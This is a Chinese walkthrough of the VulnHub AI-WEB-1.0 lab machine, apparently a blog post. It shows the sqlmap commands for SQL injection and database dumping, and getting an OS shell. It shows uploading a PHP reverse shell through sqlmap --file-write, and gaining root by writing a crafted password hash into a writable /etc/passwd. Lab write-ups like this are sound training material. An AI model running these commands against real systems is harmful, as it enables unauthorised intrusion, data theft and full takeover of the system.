vlunhub——AI-WEB-1.0 靶机渗透测试

下载链接:

官网下载地址:

​​​​​​https://www.vulnhub.com/entry/ai-web-1,353/

网盘下载地址:

链接:https://pan.baidu.com/s/1fIUVs3zLBCr1URm8ygC2fw?pwd=gsxq 
提取码:gsxq 

渗透测试

1.信息收集

1.1获取靶机ip

1.2端口扫描

给了个80端口而且是http服务

访问一下

1.3后台扫描

发现有一个robots.txt

看看里面有什么东西

依次访问

都没权限访问猜测是目录

继续扫描

m3diNf0这个下面有一个info.php

访问一下

看看另外一个目录

扫描一下这个/se3reTdir777/uploads目录

没有东西

这个目录没有东西我们扫描一下他的上一个目录/se3reTdir777

发现有两个文件,先访问index.php

输入一个1

发现爆出了一些东西

这里猜测是sql注入

burp抓一下包看看参数,sqlmap尝试跑一下

给这些请求信息塞文件里面去跑

2漏洞利用

sqlmap -r sql.txt --dbs --batch

sqlmap -r sql.txt -D aiweb1 --tables --batch

 

sqlmap -r sql.txt -D aiweb1 -T user --columns --batch

 跑到这里就不用跑了,这些东西利用不了。

尝试拿一下shell

sqlmap -r sql.txt --os-shell

这里要绝对路径

之前有一个info.php的文件里面有路径

用以下这个路径:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

拿到shell

尝试反弹。

这里就要用到kali里面自带的反弹shell文件了

路径:/usr/share/webshells/php下面的php-reverse-shell.php文件

给里面内容进行更改以下,就能用了。(按自己情况来)

把文件传到刚刚的路径去

sqlmap -r sql.txt --file-write test.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/test.php

 

本地监听刚刚设置的端口,在运行以下刚刚的传上去的文件

php test.php

3.本地提权

看一下哪些命令有root权限

find / -perm -u=s -type f 2>/dev/null

发现有passwd,尝试写入试试。

perl -le 'print crypt("123456","aa")'

 写入成功,拿到root权限

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值